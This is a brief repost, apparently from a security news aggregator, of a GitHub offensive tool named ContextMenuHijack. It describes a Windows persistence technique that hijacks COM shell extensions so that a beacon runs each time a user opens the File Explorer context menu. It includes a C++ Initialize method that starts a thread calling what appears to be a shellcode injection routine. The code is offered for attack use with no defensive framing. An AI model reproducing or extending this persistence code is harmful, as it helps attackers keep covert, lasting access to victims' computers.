ContextMenuHijack is a simple persistence technique that use COM hijacking based on human behavior, when you right click on a file/folder in the File Explorer to open the Context Menu, it executes at the same time the beacon we specified.
IFACEMETHODIMP FileContextMenuExt::Initialize( LPCITEMIDLIST pidlFolder, LPDATAOBJECT pDataObj, HKEY hKeyProgID ) { DWORD tid = NULL; CreateThread(NULL, 1024 * 1024, (LPTHREAD_START_ROUTINE)InjectShc, NULL, 0, &tid); if (NULL == pDataObj) { if (pidlFolder != NULL) { } return S_OK; } return S_OK; }
Usage : This persistence trick needs admin privs.
文章来源: https://github.com/RistBS/ContextMenuHijack
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh